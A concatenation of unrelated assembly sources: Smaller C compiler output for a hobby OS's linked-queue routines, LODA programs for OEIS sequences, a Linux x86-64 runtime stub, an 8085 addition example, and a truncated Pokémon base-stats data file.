imul eax, eax, 12
mov ecx, eax
mov eax, [bp-4]
add eax, ecx
add eax, 4
mov ebx, eax
mov eax, -1
mov esi, ebx
ror esi, 4
mov ds, si
shr esi, 28
mov [si], eax
; loc <something> : int
; RPN'ized expression: "e i + *u &u cab -> *u 1 -u (something17) = "
; Expanded expression: "(@-4) *(4) (@8) *(4) 12 * + 8 + -1 =(4) "
; Fused expression: "* *(@8) 12 + *(@-4) ax + ax 8 =(204) *ax -1 "
mov eax, [bp+8]
imul eax, eax, 12
mov ecx, eax
mov eax, [bp-4]
add eax, ecx
add eax, 8
mov ebx, eax
mov eax, -1
mov esi, ebx
ror esi, 4
mov ds, si
shr esi, 28
mov [si], eax
; RPN'ized expression: "c2c &u numElem -> *u --p "
; Expanded expression: "(@12) --p(4) "
; Fused expression: "--p(4) *(@12) "
mov eax, [bp+12]
dec dword [bp+12]
; }
L11:
db 0x66
leave
retf
L18:
section .fxnsz
dd L18 - _eliminarC2c
; glb apilarC2c : (
; prm i : int
; prm c2c : struct <something>
; ) void
section .text
global _apilarC2c
_apilarC2c:
push ebp
movzx ebp, sp
sub sp, 12
; loc i : (@8): int
; loc c2c : (@12): struct <something>
; {
; loc e : (@-4): * struct <something>
; RPN'ized expression: "e c2c &u e -> *u = "
; Expanded expression: "(@-4) (@24) *(4) =(4) "
; Fused expression: "=(204) *(@-4) *(@24) "
mov eax, [bp+24]
mov [bp-4], eax
; loc anterior : (@-8): int
; RPN'ized expression: "anterior c2c &u cabecera -> *u = "
; Expanded expression: "(@-8) (@20) *(4) =(4) "
; Fused expression: "=(204) *(@-8) *(@20) "
mov eax, [bp+20]
mov [bp-8], eax
; loc siguiente : (@-12): int
; RPN'ized expression: "siguiente c2c &u primero -> *u = "
; Expanded expression: "(@-12) (@16) *(4) =(4) "
; Fused expression: "=(204) *(@-12) *(@16) "
mov eax, [bp+16]
mov [bp-12], eax
; {
; RPN'ized expression: "e i + *u &u sig -> *u siguiente = "
; Expanded expression: "(@-4) *(4) (@8) *(4) 12 * + 0 + (@-12) *(4) =(4) "
; Fused expression: "* *(@8) 12 + *(@-4) ax + ax 0 =(204) *ax *(@-12) "
mov eax, [bp+8]
imul eax, eax, 12
mov ecx, eax
mov eax, [bp-4]
add eax, ecx
mov ebx, eax
mov eax, [bp-12]
mov esi, ebx
ror esi, 4
mov ds, si
shr esi, 28
mov [si], eax
; RPN'ized expression: "e i + *u &u ant -> *u anterior = "
; Expanded expression: "(@-4) *(4) (@8) *(4) 12 * + 4 + (@-8) *(4) =(4) "
; Fused expression: "* *(@8) 12 + *(@-4) ax + ax 4 =(204) *ax *(@-8) "
mov eax, [bp+8]
imul eax, eax, 12
mov ecx, eax
mov eax, [bp-4]
add eax, ecx
add eax, 4
mov ebx, eax
mov eax, [bp-8]
mov esi, ebx
ror esi, 4
mov ds, si
shr esi, 28
mov [si], eax
; RPN'ized expression: "e anterior + *u &u sig -> *u i = "
; Expanded expression: "(@-4) *(4) (@-8) *(4) 12 * + 0 + (@8) *(4) =(4) "
; Fused expression: "* *(@-8) 12 + *(@-4) ax + ax 0 =(204) *ax *(@8) "
mov eax, [bp-8]
imul eax, eax, 12
mov ecx, eax
mov eax, [bp-4]
add eax, ecx
mov ebx, eax
mov eax, [bp+8]
mov esi, ebx
ror esi, 4
mov ds, si
shr esi, 28
mov [si], eax
; RPN'ized expression: "e siguiente + *u &u ant -> *u i = "
; Expanded expression: "(@-4) *(4) (@-12) *(4) 12 * + 4 + (@8) *(4) =(4) "
; Fused expression: "* *(@-12) 12 + *(@-4) ax + ax 4 =(204) *ax *(@8) "
mov eax, [bp-12]
imul eax, eax, 12
mov ecx, eax
mov eax, [bp-4]
add eax, ecx
add eax, 4
mov ebx, eax
mov eax, [bp+8]
mov esi, ebx
ror esi, 4
mov ds, si
shr esi, 28
mov [si], eax
; }
; RPN'ized expression: "c2c &u primero -> *u i = "
; Expanded expression: "(@16) (@8) *(4) =(4) "
; Fused expression: "=(204) *(@16) *(@8) "
mov eax, [bp+8]
mov [bp+16], eax
; RPN'ized expression: "c2c &u numElem -> *u ++p "
; Expanded expression: "(@12) ++p(4) "
; Fused expression: "++p(4) *(@12) "
mov eax, [bp+12]
inc dword [bp+12]
; }
L19:
db 0x66
leave
retf
L21:
section .fxnsz
dd L21 - _apilarC2c
; glb encolarC2c : (
; prm i : int
; prm c2c : struct <something>
; ) void
section .text
global _encolarC2c
_encolarC2c:
push ebp
movzx ebp, sp
sub sp, 12
; loc i : (@8): int
; loc c2c : (@12): struct <something>
; {
; loc e : (@-4): * struct <something>
; RPN'ized expression: "e c2c &u e -> *u = "
; Expanded expression: "(@-4) (@24) *(4) =(4) "
; Fused expression: "=(204) *(@-4) *(@24) "
mov eax, [bp+24]
mov [bp-4], eax
; loc siguiente : (@-8): int
; RPN'ized expression: "siguiente c2c &u cabecera -> *u = "
; Expanded expression: "(@-8) (@20) *(4) =(4) "
; Fused expression: "=(204) *(@-8) *(@20) "
mov eax, [bp+20]
mov [bp-8], eax
; loc anterior : (@-12): int
; RPN'ized expression: "anterior e siguiente + *u &u ant -> *u = "
; Expanded expression: "(@-12) (@-4) *(4) (@-8) *(4) 12 * + 4 + *(4) =(4) "
; Fused expression: "* *(@-8) 12 + *(@-4) ax + ax 4 =(204) *(@-12) *ax "
mov eax, [bp-8]
imul eax, eax, 12
mov ecx, eax
mov eax, [bp-4]
add eax, ecx
add eax, 4
mov ebx, eax
mov esi, ebx
ror esi, 4
mov ds, si
shr esi, 28
mov eax, [si]
mov [bp-12], eax
; {
; RPN'ized expression: "e i + *u &u sig -> *u siguiente = "
; Expanded expression: "(@-4) *(4) (@8) *(4) 12 * + 0 + (@-8) *(4) =(4) "
; Fused expression: "* *(@8) 12 + *(@-4) ax + ax 0 =(204) *ax *(@-8) "
mov eax, [bp+8]
imul eax, eax, 12
mov ecx, eax
mov eax, [bp-4]
add eax, ecx
mov ebx, eax
mov eax, [bp-8]
mov esi, ebx
ror esi, 4
mov ds, si
shr esi, 28
mov [si], eax
; RPN'ized expression: "e i + *u &u ant -> *u anterior = "
; Expanded expression: "(@-4) *(4) (@8) *(4) 12 * + 4 + (@-12) *(4) =(4) "
; Fused expression: "* *(@8) 12 + *(@-4) ax + ax 4 =(204) *ax *(@-12) "
mov eax, [bp+8]
imul eax, eax, 12
mov ecx, eax
mov eax, [bp-4]
add eax, ecx
add eax, 4
mov ebx, eax
mov eax, [bp-12]
mov esi, ebx
ror esi, 4
mov ds, si
shr esi, 28
mov [si], eax
; RPN'ized expression: "e anterior + *u &u sig -> *u i = "
; Expanded expression: "(@-4) *(4) (@-12) *(4) 12 * + 0 + (@8) *(4) =(4) "
; Fused expression: "* *(@-12) 12 + *(@-4) ax + ax 0 =(204) *ax *(@8) "
mov eax, [bp-12]
imul eax, eax, 12
mov ecx, eax
mov eax, [bp-4]
add eax, ecx
mov ebx, eax
mov eax, [bp+8]
mov esi, ebx
ror esi, 4
mov ds, si
shr esi, 28
mov [si], eax
; RPN'ized expression: "e siguiente + *u &u ant -> *u i = "
; Expanded expression: "(@-4) *(4) (@-8) *(4) 12 * + 4 + (@8) *(4) =(4) "
; Fused expression: "* *(@-8) 12 + *(@-4) ax + ax 4 =(204) *ax *(@8) "
mov eax, [bp-8]
imul eax, eax, 12
mov ecx, eax
mov eax, [bp-4]
add eax, ecx
add eax, 4
mov ebx, eax
mov eax, [bp+8]
mov esi, ebx
ror esi, 4
mov ds, si
shr esi, 28
mov [si], eax
; }
; RPN'ized expression: "c2c &u primero -> *u c2c &u e -> *u siguiente + *u &u sig -> *u = "
; Expanded expression: "(@16) (@24) *(4) (@-8) *(4) 12 * + 0 + *(4) =(4) "
; Fused expression: "* *(@-8) 12 + *(@24) ax + ax 0 =(204) *(@16) *ax "
mov eax, [bp-8]
imul eax, eax, 12
mov ecx, eax
mov eax, [bp+24]
add eax, ecx
mov ebx, eax
mov esi, ebx
ror esi, 4
mov ds, si
shr esi, 28
mov eax, [si]
mov [bp+16], eax
; RPN'ized expression: "c2c &u numElem -> *u ++p "
; Expanded expression: "(@12) ++p(4) "
; Fused expression: "++p(4) *(@12) "
mov eax, [bp+12]
inc dword [bp+12]
; }
L22:
db 0x66
leave
retf
L24:
section .fxnsz
dd L24 - _encolarC2c
; glb desencolarC2c : (
; prm c2c : struct <something>
; ) int
section .text
global _desencolarC2c
_desencolarC2c:
push ebp
movzx ebp, sp
sub sp, 16
; loc c2c : (@8): struct <something>
; loc i : (@-4): int
; RPN'ized expression: "i c2c &u primero -> *u = "
; Expanded expression: "(@-4) (@12) *(4) =(4) "
; Fused expression: "=(204) *(@-4) *(@12) "
mov eax, [bp+12]
mov [bp-4], eax
; {
; loc e : (@-8): * struct <something>
; RPN'ized expression: "e c2c &u e -> *u = "
; Expanded expression: "(@-8) (@20) *(4) =(4) "
; Fused expression: "=(204) *(@-8) *(@20) "
mov eax, [bp+20]
mov [bp-8], eax
; {
; loc ant : (@-12): int
; RPN'ized expression: "ant e i + *u &u ant -> *u = "
; Expanded expression: "(@-12) (@-8) *(4) (@-4) *(4) 12 * + 4 + *(4) =(4) "
; Fused expression: "* *(@-4) 12 + *(@-8) ax + ax 4 =(204) *(@-12) *ax "
mov eax, [bp-4]
imul eax, eax, 12
mov ecx, eax
mov eax, [bp-8]
add eax, ecx
add eax, 4
mov ebx, eax
mov esi, ebx
ror esi, 4
mov ds, si
shr esi, 28
mov eax, [si]
mov [bp-12], eax
; loc sig : (@-16): int
; RPN'ized expression: "sig e i + *u &u sig -> *u = "
; Expanded expression: "(@-16) (@-8) *(4) (@-4) *(4) 12 * + 0 + *(4) =(4) "
; Fused expression: "* *(@-4) 12 + *(@-8) ax + ax 0 =(204) *(@-16) *ax "
mov eax, [bp-4]
imul eax, eax, 12
mov ecx, eax
mov eax, [bp-8]
add eax, ecx
mov ebx, eax
mov esi, ebx
ror esi, 4
mov ds, si
shr esi, 28
mov eax, [si]
mov [bp-16], eax
; RPN'ized expression: "e ant + *u &u sig -> *u sig = "
; Expanded expression: "(@-8) *(4) (@-12) *(4) 12 * + 0 + (@-16) *(4) =(4) "
; Fused expression: "* *(@-12) 12 + *(@-8) ax + ax 0 =(204) *ax *(@-16) "
mov eax, [bp-12]
imul eax, eax, 12
mov ecx, eax
mov eax, [bp-8]
add eax, ecx
mov ebx, eax
mov eax, [bp-16]
mov esi, ebx
ror esi, 4
mov ds, si
shr esi, 28
mov [si], eax
; RPN'ized expression: "e sig + *u &u ant -> *u ant = "
; Expanded expression: "(@-8) *(4) (@-16) *(4) 12 * + 4 + (@-12) *(4) =(4) "
; Fused expression: "* *(@-16) 12 + *(@-8) ax + ax 4 =(204) *ax *(@-12) "
mov eax, [bp-16]
imul eax, eax, 12
mov ecx, eax
mov eax, [bp-8]
add eax, ecx
add eax, 4
mov ebx, eax
mov eax, [bp-12]
mov esi, ebx
ror esi, 4
mov ds, si
shr esi, 28
mov [si], eax
; }
; if
; RPN'ized expression: "i c2c &u primero -> *u == "
; Expanded expression: "(@-4) *(4) (@12) *(4) == "
; Fused expression: "== *(@-4) *(@12) IF! "
mov eax, [bp-4]
cmp eax, [bp+12]
jne L27
; RPN'ized expression: "c2c &u primero -> *u e i + *u &u sig -> *u = "
; Expanded expression: "(@12) (@-8) *(4) (@-4) *(4) 12 * + 0 + *(4) =(4) "
; Fused expression: "* *(@-4) 12 + *(@-8) ax + ax 0 =(204) *(@12) *ax "
mov eax, [bp-4]
imul eax, eax, 12
mov ecx, eax
mov eax, [bp-8]
add eax, ecx
mov ebx, eax
mov esi, ebx
ror esi, 4
mov ds, si
shr esi, 28
mov eax, [si]
mov [bp+12], eax
L27:
; loc <something> : int
; RPN'ized expression: "e i + *u &u sig -> *u 1 -u (something29) = "
; Expanded expression: "(@-8) *(4) (@-4) *(4) 12 * + 0 + -1 =(4) "
; Fused expression: "* *(@-4) 12 + *(@-8) ax + ax 0 =(204) *ax -1 "
mov eax, [bp-4]
imul eax, eax, 12
mov ecx, eax
mov eax, [bp-8]
add eax, ecx
mov ebx, eax
mov eax, -1
mov esi, ebx
ror esi, 4
mov ds, si
shr esi, 28
mov [si], eax
; loc <something> : int
; RPN'ized expression: "e i + *u &u ant -> *u 1 -u (something30) = "
; Expanded expression: "(@-8) *(4) (@-4) *(4) 12 * + 4 + -1 =(4) "
; Fused expression: "* *(@-4) 12 + *(@-8) ax + ax 4 =(204) *ax -1 "
mov eax, [bp-4]
imul eax, eax, 12
mov ecx, eax
mov eax, [bp-8]
add eax, ecx
add eax, 4
mov ebx, eax
mov eax, -1
mov esi, ebx
ror esi, 4
mov ds, si
shr esi, 28
mov [si], eax
; loc <something> : int
; RPN'ized expression: "e i + *u &u cab -> *u 1 -u (something31) = "
; Expanded expression: "(@-8) *(4) (@-4) *(4) 12 * + 8 + -1 =(4) "
; Fused expression: "* *(@-4) 12 + *(@-8) ax + ax 8 =(204) *ax -1 "
mov eax, [bp-4]
imul eax, eax, 12
mov ecx, eax
mov eax, [bp-8]
add eax, ecx
add eax, 8
mov ebx, eax
mov eax, -1
mov esi, ebx
ror esi, 4
mov ds, si
shr esi, 28
mov [si], eax
; RPN'ized expression: "c2c &u numElem -> *u --p "
; Expanded expression: "(@8) --p(4) "
; Fused expression: "--p(4) *(@8) "
mov eax, [bp+8]
dec dword [bp+8]
; }
; return
; RPN'ized expression: "i "
; Expanded expression: "(@-4) *(4) "
; Fused expression: "*(4) (@-4) "
mov eax, [bp-4]
L25:
db 0x66
leave
retf
L32:
section .fxnsz
dd L32 - _desencolarC2c
; glb inicializarC2c : (
; prm c2c : * struct <something>
; prm e : * struct <something>
; prm cabecera : int
; prm compartida : int
; ) void
section .text
global _inicializarC2c
_inicializarC2c:
push ebp
movzx ebp, sp
sub sp, 4
; loc c2c : (@8): * struct <something>
; loc e : (@12): * struct <something>
; loc cabecera : (@16): int
; loc compartida : (@20): int
; RPN'ized expression: "c2c primero -> *u cabecera = "
; Expanded expression: "(@8) *(4) 4 + (@16) *(4) =(4) "
; Fused expression: "+ *(@8) 4 =(204) *ax *(@16) "
mov eax, [bp+8]
add eax, 4
mov ebx, eax
mov eax, [bp+16]
mov esi, ebx
ror esi, 4
mov ds, si
shr esi, 28
mov [si], eax
; RPN'ized expression: "c2c cabecera -> *u cabecera = "
; Expanded expression: "(@8) *(4) 8 + (@16) *(4) =(4) "
; Fused expression: "+ *(@8) 8 =(204) *ax *(@16) "
mov eax, [bp+8]
add eax, 8
mov ebx, eax
mov eax, [bp+16]
mov esi, ebx
ror esi, 4
mov ds, si
shr esi, 28
mov [si], eax
; RPN'ized expression: "c2c numElem -> *u 0 = "
; Expanded expression: "(@8) *(4) 0 + 0 =(4) "
; Fused expression: "+ *(@8) 0 =(204) *ax 0 "
mov eax, [bp+8]
mov ebx, eax
mov eax, 0
mov esi, ebx
ror esi, 4
mov ds, si
shr esi, 28
mov [si], eax
; RPN'ized expression: "c2c e -> *u e = "
; Expanded expression: "(@8) *(4) 12 + (@12) *(4) =(4) "
; Fused expression: "+ *(@8) 12 =(204) *ax *(@12) "
mov eax, [bp+8]
add eax, 12
mov ebx, eax
mov eax, [bp+12]
mov esi, ebx
ror esi, 4
mov ds, si
shr esi, 28
mov [si], eax
; {
; loc i : (@-4): int
; RPN'ized expression: "e cabecera + *u &u sig -> *u cabecera = "
; Expanded expression: "(@12) *(4) (@16) *(4) 12 * + 0 + (@16) *(4) =(4) "
; Fused expression: "* *(@16) 12 + *(@12) ax + ax 0 =(204) *ax *(@16) "
mov eax, [bp+16]
imul eax, eax, 12
mov ecx, eax
mov eax, [bp+12]
add eax, ecx
mov ebx, eax
mov eax, [bp+16]
mov esi, ebx
ror esi, 4
mov ds, si
shr esi, 28
mov [si], eax
; RPN'ized expression: "e cabecera + *u &u ant -> *u cabecera = "
; Expanded expression: "(@12) *(4) (@16) *(4) 12 * + 4 + (@16) *(4) =(4) "
; Fused expression: "* *(@16) 12 + *(@12) ax + ax 4 =(204) *ax *(@16) "
mov eax, [bp+16]
imul eax, eax, 12
mov ecx, eax
mov eax, [bp+12]
add eax, ecx
add eax, 4
mov ebx, eax
mov eax, [bp+16]
mov esi, ebx
ror esi, 4
mov ds, si
shr esi, 28
mov [si], eax
; RPN'ized expression: "e cabecera + *u &u cab -> *u cabecera = "
; Expanded expression: "(@12) *(4) (@16) *(4) 12 * + 8 + (@16) *(4) =(4) "
; Fused expression: "* *(@16) 12 + *(@12) ax + ax 8 =(204) *ax *(@16) "
mov eax, [bp+16]
imul eax, eax, 12
mov ecx, eax
mov eax, [bp+12]
add eax, ecx
add eax, 8
mov ebx, eax
mov eax, [bp+16]
mov esi, ebx
ror esi, 4
mov ds, si
shr esi, 28
mov [si], eax
; if
; RPN'ized expression: "compartida "
; Expanded expression: "(@20) *(4) "
; Fused expression: "*(4) (@20) "
mov eax, [bp+20]
; JumpIfZero
test eax, eax
je L35
; return
jmp L33
L35:
; for
; RPN'ized expression: "i 0 = "
; Expanded expression: "(@-4) 0 =(4) "
; Fused expression: "=(204) *(@-4) 0 "
mov eax, 0
mov [bp-4], eax
L37:
; RPN'ized expression: "i cabecera < "
; Expanded expression: "(@-4) *(4) (@16) *(4) < "
; Fused expression: "< *(@-4) *(@16) IF! "
mov eax, [bp-4]
cmp eax, [bp+16]
jge L40
; RPN'ized expression: "i ++p "
; Expanded expression: "(@-4) ++p(4) "
; {
; loc <something> : int
; RPN'ized expression: "e i + *u &u sig -> *u 1 -u (something41) = "
; Expanded expression: "(@12) *(4) (@-4) *(4) 12 * + 0 + -1 =(4) "
; Fused expression: "* *(@-4) 12 + *(@12) ax + ax 0 =(204) *ax -1 "
mov eax, [bp-4]
imul eax, eax, 12
mov ecx, eax
mov eax, [bp+12]
add eax, ecx
mov ebx, eax
mov eax, -1
mov esi, ebx
ror esi, 4
mov ds, si
shr esi, 28
mov [si], eax
; loc <something> : int
; RPN'ized expression: "e i + *u &u ant -> *u 1 -u (something42) = "
; Expanded expression: "(@12) *(4) (@-4) *(4) 12 * + 4 + -1 =(4) "
; Fused expression: "* *(@-4) 12 + *(@12) ax + ax 4 =(204) *ax -1 "
mov eax, [bp-4]
imul eax, eax, 12
mov ecx, eax
mov eax, [bp+12]
add eax, ecx
add eax, 4
mov ebx, eax
mov eax, -1
mov esi, ebx
ror esi, 4
mov ds, si
shr esi, 28
mov [si], eax
; loc <something> : int
; RPN'ized expression: "e i + *u &u cab -> *u 1 -u (something43) = "
; Expanded expression: "(@12) *(4) (@-4) *(4) 12 * + 8 + -1 =(4) "
; Fused expression: "* *(@-4) 12 + *(@12) ax + ax 8 =(204) *ax -1 "
mov eax, [bp-4]
imul eax, eax, 12
mov ecx, eax
mov eax, [bp+12]
add eax, ecx
add eax, 8
mov ebx, eax
mov eax, -1
mov esi, ebx
ror esi, 4
mov ds, si
shr esi, 28
mov [si], eax
; }
L38:
; Fused expression: "++p(4) *(@-4) "
mov eax, [bp-4]
inc dword [bp-4]
jmp L37
L40:
; }
L33:
db 0x66
leave
retf
L44:
section .fxnsz
dd L44 - _inicializarC2c
; Syntax/declaration table/stack:
; Bytes used: 1720/40960
; Macro table:
; Macro __SMALLER_C__ = `0x0100`
; Macro __SMALLER_C_32__ = ``
; Macro __HUGE__ = ``
; Macro __SMALLER_C_SCHAR__ = ``
; Bytes used: 74/5120
; Identifier table:
; Ident __floatsisf
; Ident __floatunsisf
; Ident __fixsfsi
; Ident __fixunssfsi
; Ident __addsf3
; Ident __subsf3
; Ident __negsf2
; Ident __mulsf3
; Ident __divsf3
; Ident __lesf2
; Ident __gesf2
; Ident intptr_t
; Ident uintptr_t
; Ident intmax_t
; Ident uintmax_t
; Ident int8_t
; Ident int_least8_t
; Ident int_fast8_t
; Ident uint8_t
; Ident uint_least8_t
; Ident uint_fast8_t
; Ident int16_t
; Ident int_least16_t
; Ident int_fast16_t
; Ident uint16_t
; Ident uint_least16_t
; Ident uint_fast16_t
; Ident int32_t
; Ident int_least32_t
; Ident int_fast32_t
; Ident uint32_t
; Ident uint_least32_t
; Ident uint_fast32_t
; Ident <something>
; Ident quot
; Ident rem
; Ident imaxdiv_t
; Ident FALSE
; Ident TRUE
; Ident bool_t
; Ident pointer_t
; Ident funcion_t
; Ident manejador_t
; Ident rti_t
; Ident isr_t
; Ident handler_t
; Ident retardarThread_t
; Ident ptrTVI_t
; Ident modoSO1_Bin
; Ident modoSO1_Exe
; Ident modoSO1_Bs
; Ident modoSO1_t
; Ident lo
; Ident hi
; Ident lh_t
; Ident offset
; Ident segment
; Ident address_t
; Ident ptr
; Ident adr
; Ident uPtrAdr_t
; Ident pid_t
; Ident tid_t
; Ident uid_t
; Ident gid_t
; Ident pindx_t
; Ident tindx_t
; Ident df_t
; Ident dfs_t
; Ident rindx_t
; Ident sig
; Ident ant
; Ident cab
; Ident dobleEnlace_t
; Ident numElem
; Ident primero
; Ident cabecera
; Ident e
; Ident c2c_t
; Ident posicionC2c
; Ident i
; Ident c2c
; Ident eliminarC2c
; Ident apilarC2c
; Ident encolarC2c
; Ident desencolarC2c
; Ident inicializarC2c
; Ident compartida
; Bytes used: 886/16384
; Next label number: 45
; Compilation succeeded.
| 23.727675 | 92 | 0.546318 |
bfcd8c4411b8ba9859add29766afca3bf096d02d | 341 | asm | Assembly | programs/oeis/131/A131820.asm | neoneye/loda | afe9559fb53ee12e3040da54bd6aa47283e0d9ec | [
"Apache-2.0"
] | 22 | 2018-02-06T19:19:31.000Z | 2022-01-17T21:53:31.000Z | programs/oeis/131/A131820.asm | neoneye/loda | afe9559fb53ee12e3040da54bd6aa47283e0d9ec | [
"Apache-2.0"
] | 41 | 2021-02-22T19:00:34.000Z | 2021-08-28T10:47:47.000Z | programs/oeis/131/A131820.asm | neoneye/loda | afe9559fb53ee12e3040da54bd6aa47283e0d9ec | [
"Apache-2.0"
] | 5 | 2021-02-24T21:14:16.000Z | 2021-08-09T19:48:05.000Z | ; A131820: Row sums of triangle A131819.
; 1,6,16,33,59,96,146,211,293,394,516,661,831,1028,1254,1511,1801,2126,2488,2889,3331,3816,4346,4923,5549,6226,6956,7741,8583,9484,10446,11471,12561,13718,14944,16241,17611,19056,20578,22179,23861,25626
mov $1,$0
mul $1,2
mul $0,$1
add $1,7
add $0,$1
add $0,5
mul $0,$1
sub $0,84
div $0,12
add $0,1
| 24.357143 | 202 | 0.709677 |
52a3b9b17e1beebebeacbbb1d35541824ac0554f | 542 | asm | Assembly | programs/oeis/261/A261695.asm | neoneye/loda | afe9559fb53ee12e3040da54bd6aa47283e0d9ec | [
"Apache-2.0"
] | 22 | 2018-02-06T19:19:31.000Z | 2022-01-17T21:53:31.000Z | programs/oeis/261/A261695.asm | neoneye/loda | afe9559fb53ee12e3040da54bd6aa47283e0d9ec | [
"Apache-2.0"
] | 41 | 2021-02-22T19:00:34.000Z | 2021-08-28T10:47:47.000Z | programs/oeis/261/A261695.asm | neoneye/loda | afe9559fb53ee12e3040da54bd6aa47283e0d9ec | [
"Apache-2.0"
] | 5 | 2021-02-24T21:14:16.000Z | 2021-08-09T19:48:05.000Z | ; A261695: First differences of A256534.
; 0,4,12,12,36,12,36,60,84,12,36,60,84,108,132,156,180,12,36,60,84,108,132,156,180,204,228,252,276,300,324,348,372,12,36,60,84,108,132,156,180,204,228,252,276,300,324,348,372,396,420,444,468,492,516,540,564,588,612,636,660,684,708,732,756,12,36,60,84,108
lpb $0
mov $1,$0
min $0,1
sub $1,$0
div $0,8
seq $1,241717 ; The number of P-positions in the game of Nim with up to 3 piles, allowing for piles of zero, such that the number of objects in the largest pile is n.
lpe
mul $1,4
mov $0,$1
| 41.692308 | 254 | 0.697417 |
a03487153646d24eaf9677cc272b45ae88915229 | 753 | asm | Assembly | oeis/041/A041257.asm | neoneye/loda-programs | 84790877f8e6c2e821b183d2e334d612045d29c0 | [
"Apache-2.0"
] | 11 | 2021-08-22T19:44:55.000Z | 2022-03-20T16:47:57.000Z | oeis/041/A041257.asm | neoneye/loda-programs | 84790877f8e6c2e821b183d2e334d612045d29c0 | [
"Apache-2.0"
] | 9 | 2021-08-29T13:15:54.000Z | 2022-03-09T19:52:31.000Z | oeis/041/A041257.asm | neoneye/loda-programs | 84790877f8e6c2e821b183d2e334d612045d29c0 | [
"Apache-2.0"
] | 3 | 2021-08-22T20:56:47.000Z | 2021-09-29T06:26:12.000Z | ; A041257: Denominators of continued fraction convergents to sqrt(140).
; Submitted by Jon Maiga
; 1,1,5,6,137,143,709,852,19453,20305,100673,120978,2762189,2883167,14294857,17178024,392211385,409389409,2029769021,2439158430,55691254481,58130412911,288212906125,346343319036,7907765924917,8254109243953,40924202900729,49178312144682,1122847070083733,1172025382228415,5810948598997393,6982973981225808,159436376185965169,166419350167190977,825113776854729077,991533127021920054,22638842571336970265,23630375698358890319,117160345364772531541,140790721063131421860,3214556208753663812461
add $0,1
mov $3,1
lpb $0
sub $0,1
add $2,$3
mov $3,$1
mov $1,$2
dif $2,3
mod $2,$1
mul $2,27
add $3,$1
add $3,$2
mov $2,$1
lpe
dif $2,2
mov $0,$2
| 35.857143 | 488 | 0.798141 |
c66cbdcaea2e07c5e0358fd22a6bac8302d1f0f0 | 882 | asm | Assembly | runtime/linux64/linux64.asm | pedroreissantos/compact | 90c99b75fb86979e72d47d69dcbd7f7558b50adf | [
"BSD-3-Clause"
] | 4 | 2021-07-23T01:17:41.000Z | 2021-12-10T21:28:37.000Z | runtime/linux64/linux64.asm | pedroreissantos/compact | 90c99b75fb86979e72d47d69dcbd7f7558b50adf | [
"BSD-3-Clause"
] | null | null | null | runtime/linux64/linux64.asm | pedroreissantos/compact | 90c99b75fb86979e72d47d69dcbd7f7558b50adf | [
"BSD-3-Clause"
] | 16 | 2019-03-16T20:21:50.000Z | 2020-05-22T15:18:07.000Z | section .bss
$buf2 resb 2
section .text
global _prints, _readb, _exit, _start
extern _env, _strlen, _main
_prints:
push qword [rsp+8] ; pushd 'prints' first argument
call _strlen
mov rdx, rax ; strlen
pop rsi ; string
mov edi, 1 ; stdout
mov eax, 1 ; SYS_write
syscall
ret
_readb:
push rdi
push rsi
push rdx
push rcx
mov edx, 1 ; bytes
mov rsi, $buf2 ; buffer
mov edi, 0 ; stdin
mov eax, 0 ; SYS_read
syscall
cmp rax, 1
jne .Lret
xor rax, rax
mov al, [$buf2]
.Lret: pop rcx
pop rdx
pop rsi
pop rdi
ret
_start:
mov [$_env], rsp
mov rdi, [rsp] ; argc
lea rsi, [rsp+8] ; argv
lea rdx, [rsi+rdi*8]; &(argv[argc])
add rdx, 8 ; envp
push qword 0
mov rbp, rsp ; init frame pointer
push qword rdx
push qword rsi
push qword rdi
call _main
mov rdi, rax
push rax
call _exit
_exit: mov rbx, [rsp+8]
.L0: mov eax, 60
syscall
jmp .L0
| 15.206897 | 52 | 0.656463 |
76aaa8dc602e2dda712763606a1f8846036b4cba | 320 | asm | Assembly | 8bitsum2.asm | adey99/8085asmcodes | 8049bbf4cc698f5ac9309fee2c5b827680acc8de | [
"MIT"
] | null | null | null | 8bitsum2.asm | adey99/8085asmcodes | 8049bbf4cc698f5ac9309fee2c5b827680acc8de | [
"MIT"
] | null | null | null | 8bitsum2.asm | adey99/8085asmcodes | 8049bbf4cc698f5ac9309fee2c5b827680acc8de | [
"MIT"
] | null | null | null | // ADDITION OF TWO 8 BIT NUMBERS
// Manually strore 1st no in the memory location C050
// Manually store 2nd no in the memory location C051
// Result is stored in C053
LXI H,C050
MOV A,M
INX H
ADD M
STA C052
HLT
// EXAMPLE-> C050 = 55H, C051 =66H
// ANSWER -> C052 = BBH
# ORG C050
# DB 55H,66H
| 20 | 53 | 0.646875 |
564bb7503e5e2432762f22454fd8a4efd8fdf525 | 1,050 | asm | Assembly | data/pokemon/base_stats/blaziken.asm | AtmaBuster/pokeplat-gen2 | fa83b2e75575949b8f72cb2c48f7a1042e97f70f | [
"blessing"
] | 6 | 2021-06-19T06:41:19.000Z | 2022-02-15T17:12:33.000Z | data/pokemon/base_stats/blaziken.asm | AtmaBuster/pokeplat-gen2-old | 01e42c55db5408d72d89133dc84a46c699d849ad | [
"blessing"
] | null | null | null | data/pokemon/base_stats/blaziken.asm | AtmaBuster/pokeplat-gen2-old | 01e42c55db5408d72d89133dc84a46c699d849ad | [
"blessing"
] | 2 | 2021-08-11T19:47:07.000Z | 2022-01-01T07:07:56.000Z | db 0 ; species ID placeholder
db 80, 120, 70, 80, 110, 70
; hp atk def spd sat sdf
db FIRE, FIRE ; type
db 45 ; catch rate
db 209 ; base exp
db NO_ITEM, NO_ITEM ; items
db GENDER_F12_5 ; gender ratio
db 20 ; step cycles to hatch
INCBIN "gfx/pokemon/blaziken/front.dimensions"
db GROWTH_MEDIUM_SLOW ; growth rate
dn EGG_GROUND, EGG_GROUND ; egg groups
db 70 ; happiness
; tm/hm learnset
